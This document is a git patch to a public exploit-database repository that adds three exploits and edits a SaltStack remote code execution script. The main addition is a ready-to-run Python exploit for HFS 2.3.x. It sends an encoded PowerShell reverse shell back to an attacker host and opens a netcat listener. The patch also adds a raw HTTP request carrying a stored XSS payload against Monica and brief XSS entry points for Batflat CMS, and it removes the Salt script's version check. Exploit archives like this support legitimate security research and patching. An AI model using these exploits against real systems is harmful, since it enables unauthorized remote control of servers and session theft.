From 44132fc90baa3ba848957cb288bc89b58865df55 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 24 Feb 2021 05:01:57 +0000 Subject: [PATCH] DB: 2021-02-24 4 changes to exploits/shellcodes HFS (HTTP File Server) 2.3.x - Remote Command Execution (3) Monica 2.19.1 - 'last_name' Stored XSS Batflat CMS 1.3.6 - 'multiple' Stored XSS --- exploits/multiple/remote/48421.txt | 31 ++++-------------- exploits/multiple/webapps/49582.txt | 24 ++++++++++++++ exploits/php/webapps/49583.txt | 27 ++++++++++++++++ exploits/windows/remote/49584.py | 50 +++++++++++++++++++++++++++++ files_exploits.csv | 3 ++ 5 files changed, 111 insertions(+), 24 deletions(-) create mode 100644 exploits/multiple/webapps/49582.txt create mode 100644 exploits/php/webapps/49583.txt create mode 100755 exploits/windows/remote/49584.py diff --git a/exploits/multiple/remote/48421.txt b/exploits/multiple/remote/48421.txt index 5bd051b35..6aa455263 100644 --- a/exploits/multiple/remote/48421.txt +++ b/exploits/multiple/remote/48421.txt @@ -48,16 +48,6 @@ def init_minion(master_ip, master_port): # --- check funcs ---- -def check_salt_version(): - print("[+] Salt version: {}".format(salt.version.__version__)) - - vi = salt.version.__version_info__ - - if (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)): - return True - else: - return False - def check_connection(master_ip, master_port, channel): print("[+] Checking salt-master ({}:{}) status... ".format(master_ip, master_port), end='') sys.stdout.flush() @@ -74,21 +64,21 @@ def check_connection(master_ip, master_port, channel): def check_CVE_2020_11651(channel): print("[+] Checking if vulnerable to CVE-2020-11651... ", end='') sys.stdout.flush() - # try to evil + try: rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3) - except salt.exceptions.SaltReqTimeoutError: - print("YES") except: - print("ERROR") - raise + print('ERROR') + return None else: - pass + pass finally: if rets: + print('YES') root_key = rets[2]['root'] return root_key + print('NO') return None def check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path): @@ -334,18 +324,11 @@ def main(): channel = init_minion(args.master_ip, args.master_port) - if check_salt_version(): - print("[ ] This version of salt is vulnerable! Check results below") - elif args.force: - print("[*] This version of salt does NOT appear vulnerable. Proceeding anyway as requested.") - else: - sys.exit() - check_connection(args.master_ip, args.master_port, channel) root_key = check_CVE_2020_11651(channel) if root_key: - print('\n[*] root key obtained: {}'.format(root_key)) + print('[*] root key obtained: {}'.format(root_key)) else: print('[-] Failed to find root key...aborting') sys.exit(127) diff --git a/exploits/multiple/webapps/49582.txt b/exploits/multiple/webapps/49582.txt new file mode 100644 index 000000000..373791be2 --- /dev/null +++ b/exploits/multiple/webapps/49582.txt @@ -0,0 +1,24 @@ +# Exploit Title: Monica 2.19.1 - 'last_name' Stored XSS +# Date: 22-02-2021 +# Exploit Author: BouSalman +# Vendor Homepage: https://www.monicahq.com/ +# Software Link: https://github.com/monicahq/monica/releases +# Version: Monica 2.19.1 +# Tested on: Ubuntu 18.04 +# CVE : CVE-2021-27370 + +POST /people HTTP/1.1 +Host: 192.168.99.162 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 199 +Origin: http://192.168.99.162 +Connection: close +Referer: http://192.168.99.162/people/add +Cookie: remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IjZBQ21CelczS1ZxS1dmMkNxWFBqN1E9PSIsInZhbHVlIjoiME01aDNSS2FHQ1lZdS9KSVlSL1pKdC9qcHRWRDVveWFvb0ZkUFB4cFlaSDhEclB3SG9UQ3BISzVoWFdYQUYrVkdpUVNkRUNlbUxFOTEyOC9Vb1ZaWFZTblpGOWlRVW9PR0FmSVhyL3JwUmgweU9hODlJWU5vNmQ3aDcrT084MjBoQU5Ednh0TWJ6dmxwS2NadFovMEdveko1V0RvbThXT2Jram1JVW5LcXdqUzl4alVBRDFBYXNjSEt3amRxbVFvQ3pMMGJZU2owWTZzWVp1ZURTNUtoRUlJMnVrV3NiVHRNRTU5YysvLzl2Zz0iLCJtYWMiOiI5MTc2NDAwZTY4NjVmZDg3NjM1YjY3NDRiMzFhMmRiYzIwMjFhODU4YWQyOWUwZmQzOTBlY2Y1ZTI0ODdiNzVkIn0%3D; laravel_token=eyJpdiI6InIwQ2RlQW9FRG5lanlOZmlXWXBRVEE9PSIsInZhbHVlIjoiUHhPNmZneXUydGVCZHlVMEI5cHpiTWI2OE5qajN5UVJXUmJHSFV1VGgya2NEbEJ6T3N0QVhKeUZwU0R4a05HWTgwNTNidTk4aGNXc3UzejY4WDJnaUJ0VUp1ekQ5cjVDc0hLSWpGTzc1ZWRRQ05Yem0vK3RZdEpOVHNQeE4rQ1orbXNJTXhWczJnMENYeGp6Q3NnOGU5TXhpZDd1bS9wRlBZS0xsYmpLSXJiMHhSVmU2NnBUMjdYS1RTQmJrNkU4cWNtZGJVdjFpaXp5a2YzdVZsWWxQMjBicDQxUGFjZlhGbmhCOHl2MkVXdzRoalNtbE9xL010clpZMGJNVmVQNWUzQlpsRFVKamlWQ2Jydk9sZWg3cHNKWVIvRW92alp0YURJcllXa08rTjA4Y2lvVzNHTXBrem11Q21xaW92cEwiLCJtYWMiOiI1YjM5NzViODhjNTk5MWUzNWFjZDg0ZWZmNjk1NjE3MzhhN2M0NGFjNWE3MzMyMGFhNTI2ZjgxMjE4OTRjZDg4In0%3D; XSRF-TOKEN=eyJpdiI6IkZFY1FLVEJFRXJMOWh6Vll1SW51akE9PSIsInZhbHVlIjoiRTVLRFZnOEovNk9XeFB2bXFQZnFlM0FxRU9QMVRxaHRhS3RzOHNpWm45K0xXV1FsbWhzV0RxUWd6bStxVXFBTHF1WlkrSklnSXoxbkFXK1JNcURhUHp6eTFOUHdLclFkTTEvUFhtTDgzVHA2RElFNnVuOWVyRGxCSGJmdzhJOXciLCJtYWMiOiIxOWNlMjkxMjM5ZTlmMDFiZjhiM2VlZjZjZmNmMmFmZDA4MzcyZjc3Yzg2MmQ2MWIwNTY2OTZlNjQyZDkzMjA0In0%3D; laravel_session=eyJpdiI6InBtUThtUFE1RzdvbW40ay8wdWJraXc9PSIsInZhbHVlIjoiS1hoVlJoNzFrYlpBUGRTL2V0YzVDRlR6dHl6NE12NjFxVTEvbXQwYTJnRUwyY3VQc2hOeWlkbUdyeEx5aDBnYlJER1BnbW52RXR0QWs1ZG00eWg0U2JNb3dIRTQ0aU9HK0JnTzE5eXQwUGlzbDNsbVFVa3RabWVQVzF4OXJsUTMiLCJtYWMiOiI3YmQwZDFkYjAwMzdlZTllODAzYjZmNzQ2YWI5NTMzMDY0ZWIzMWIyOWI4MjM4ODMzMDdhNjc2YTE4ZDViZDg0In0%3D +Upgrade-Insecure-Requests: 1 + +_token=afJRD6VqgCxIze3tGcCqzyeb3YaFka3fvjqV9YOx&first_name=XSS+POC&middle_name=&last_name=%7B%7B+constructor.constructor%28%22alert%28document.cookie%29%22%29%28%29+%7D%7D&nickname=&gender=&save=true \ No newline at end of file diff --git a/exploits/php/webapps/49583.txt b/exploits/php/webapps/49583.txt new file mode 100644 index 000000000..5551a32ac --- /dev/null +++ b/exploits/php/webapps/49583.txt @@ -0,0 +1,27 @@ +# Exploit Title: Batflat CMS 1.3.6 - 'multiple' Stored XSS +# Date: 22/02/2021 +# Exploit Author: Tadjmen +# Vendor Homepage: https://batflat.org/ +# Software Link: https://github.com/sruupl/batflat/archive/master.zip +# Version: 1.3.6 +# Tested on: Xammpp on Windows, Firefox Newest +# CVE : N/A + +Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6 + +Login with editor account with rights to Navigation, Galleries, Snippets + +Navigation +- Add link +payload: "> + +Galleries +- Add gallery +payload: mlem"> + +Snippets +- Add Snippets +payload: mlem"> + +More information: +https://github.com/sruupl/batflat/issues/105 \ No newline at end of file diff --git a/exploits/windows/remote/49584.py b/exploits/windows/remote/49584.py new file mode 100755 index 000000000..f8d537544 --- /dev/null +++ b/exploits/windows/remote/49584.py @@ -0,0 +1,50 @@ +# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3) +# Google Dork: intext:"httpfileserver 2.3" +# Date: 20/02/2021 +# Exploit Author: Pergyz +# Vendor Homepage: http://www.rejetto.com/hfs/ +# Software Link: https://sourceforge.net/projects/hfs/ +# Version: 2.3.x +# Tested on: Microsoft Windows Server 2012 R2 Standard +# CVE : CVE-2014-6287 +# Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands + +#!/usr/bin/python3 + +import base64 +import os +import urllib.request +import urllib.parse + +lhost = "10.10.10.1" +lport = 1111 +rhost = "10.10.10.8" +rport = 80 + +# Define the command to be written to a file +command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{{0}}; while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (Invoke-Expression $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (Get-Location).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}}; $client.Close()' + +# Encode the command in base64 format +encoded_command = base64.b64encode(command.encode("utf-16le")).decode() +print("\nEncoded the command in base64 format...") + +# Define the payload to be included in the URL +payload = f'exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand {encoded_command}' + +# Encode the payload and send a HTTP GET request +encoded_payload = urllib.parse.quote_plus(payload) +url = f'http://{rhost}:{rport}/?search=%00{{.{encoded_payload}.}}' +urllib.request.urlopen(url) +print("\nEncoded the payload and sent a HTTP GET request to the target...") + +# Print some information +print("\nPrinting some information for debugging...") +print("lhost: ", lhost) +print("lport: ", lport) +print("rhost: ", rhost) +print("rport: ", rport) +print("payload: ", payload) + +# Listen for connections +print("\nListening for connection...") +os.system(f'nc -nlvp {lport}') \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 3d2865ad7..d38b8bb4f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18354,6 +18354,7 @@ id,file,description,date,author,type,platform,port 48389,exploits/windows/remote/48389.py,"CloudMe 1.11.2 - Buffer Overflow (PoC)",2020-04-28,"Andy Bowden",remote,windows, 48410,exploits/multiple/remote/48410.rb,"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)",2020-05-01,Metasploit,remote,multiple, 48421,exploits/multiple/remote/48421.txt,"Saltstack 3000.1 - Remote Code Execution",2020-05-05,"Jasper Lievisse Adriaanse",remote,multiple, +49584,exploits/windows/remote/49584.py,"HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)",2021-02-23,Pergyz,remote,windows, 48483,exploits/multiple/remote/48483.txt,"HP LinuxKI 6.01 - Remote Command Injection",2020-05-18,"Cody Winkler",remote,multiple, 48491,exploits/php/remote/48491.rb,"Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)",2020-05-19,Metasploit,remote,php, 48508,exploits/multiple/remote/48508.rb,"WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)",2020-05-22,Metasploit,remote,multiple, @@ -43140,6 +43141,7 @@ id,file,description,date,author,type,platform,port 48417,exploits/php/webapps/48417.txt,"Fishing Reservation System 7.5 - 'uid' SQL Injection",2020-05-05,Vulnerability-Lab,webapps,php, 48419,exploits/php/webapps/48419.txt,"Online Scheduling System 1.0 - 'username' SQL Injection",2020-05-05,"Saurav Shukla",webapps,php, 48420,exploits/php/webapps/48420.txt,"webERP 4.15.1 - Unauthenticated Backup File Access",2020-05-05,Besim,webapps,php, +49582,exploits/multiple/webapps/49582.txt,"Monica 2.19.1 - 'last_name' Stored XSS",2021-02-23,BouSalman,webapps,multiple, 48423,exploits/php/webapps/48423.txt,"PhreeBooks ERP 5.2.5 - Remote Command Execution",2020-05-05,Besim,webapps,php, 48424,exploits/php/webapps/48424.txt,"SimplePHPGal 0.7 - Remote File Inclusion",2020-05-05,h4shur,webapps,php, 48425,exploits/hardware/webapps/48425.txt,"NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration",2020-05-05,"Cold z3ro",webapps,hardware, @@ -43180,6 +43182,7 @@ id,file,description,date,author,type,platform,port 49576,exploits/php/webapps/49576.txt,"Online Exam System With Timer 1.0 - 'email' SQL injection Auth Bypass",2021-02-19,"Suresh Kumar",webapps,php, 49578,exploits/multiple/webapps/49578.txt,"OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting",2021-02-19,"Kamil Breński",webapps,multiple, 49580,exploits/php/webapps/49580.txt,"Beauty Parlour Management System 1.0 - 'sername' SQL Injection",2021-02-19,"Thinkland Security Team",webapps,php, +49583,exploits/php/webapps/49583.txt,"Batflat CMS 1.3.6 - 'multiple' Stored XSS",2021-02-23,Tadjmen,webapps,php, 48466,exploits/php/webapps/48466.txt,"Tryton 5.4 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php, 48467,exploits/php/webapps/48467.txt,"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php, 48468,exploits/php/webapps/48468.py,"Complaint Management System 1.0 - 'username' SQL Injection",2020-05-14,"Daniel Ortiz",webapps,php,